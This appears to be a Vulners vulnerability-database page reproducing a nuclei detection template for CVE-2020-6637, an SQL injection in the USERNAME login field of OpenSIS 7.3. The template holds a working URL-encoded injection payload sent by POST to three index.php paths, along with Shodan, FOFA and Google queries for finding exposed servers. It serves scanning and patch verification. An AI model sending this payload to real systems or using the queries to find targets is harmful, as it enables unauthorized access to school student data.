Lucene search
K

OpenSIS 7.3 - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

OpenSIS 7.3 SQL Injection via USERNAME paramete

Related
Refs
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
OpenSIS SQL Injection (CVE-2020-6637; CVE-2020-6137; CVE-2020-6138; CVE-2020-6139; CVE-2020-6140; CVE-2020-6141)
21 Sep 202000:00
checkpoint_advisories
CVE
CVE-2020-6637
24 Aug 202019:01
cve
Cvelist
CVE-2020-6637
24 Aug 202019:01
cvelist
NVD
CVE-2020-6637
24 Aug 202019:15
nvd
OSV
CVE-2020-6637
24 Aug 202019:15
osv
Prion
Sql injection
24 Aug 202019:15
prion
Prion
Sql injection
1 Sep 202101:15
prion
RedhatCVE
CVE-2020-6637
22 May 202515:41
redhatcve
id: CVE-2020-6637

info:
  name: OpenSIS 7.3 - SQL Injection
  author: pikpikcu
  severity: critical
  description: OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of OpenSIS.
  reference:
    - https://cinzinga.com/CVE-2020-6637/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-6637
    - https://sourceforge.net/projects/opensis-ce/files/
    - https://github.com/OS4ED/openSIS-Responsive-Design/commit/1127ae0bb7c3a2883febeabc6b71ad8d73510de8
    - https://opensis.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-6637
    cwe-id: CWE-89
    epss-score: 0.20058
    epss-percentile: 0.97125
    cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:*
  metadata:
    max-request: 3
    vendor: os4ed
    product: opensis
    shodan-query:
      - http.title:"openSIS"
      - http.title:"opensis"
    fofa-query: title="opensis"
    google-query: intitle:"opensis"
  tags: cve,cve2020,sqli,opensis,os4ed,vuln

http:
  - method: POST
    path:
      - '{{BaseURL}}/account/index.php'
      - '{{BaseURL}}/opensis/index.php'
      - '{{BaseURL}}/index.php'

    body: |
      USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'SQL STATEMENT:'
          - "<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008ba9996444f4e01d464056b202710aad1bf87f57f21583e792b265162ea30ad7022100adc1458c76bbebf14269832807833ccdb4e99b07cfe08cf2c6476a3d860b0a27:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.20058
17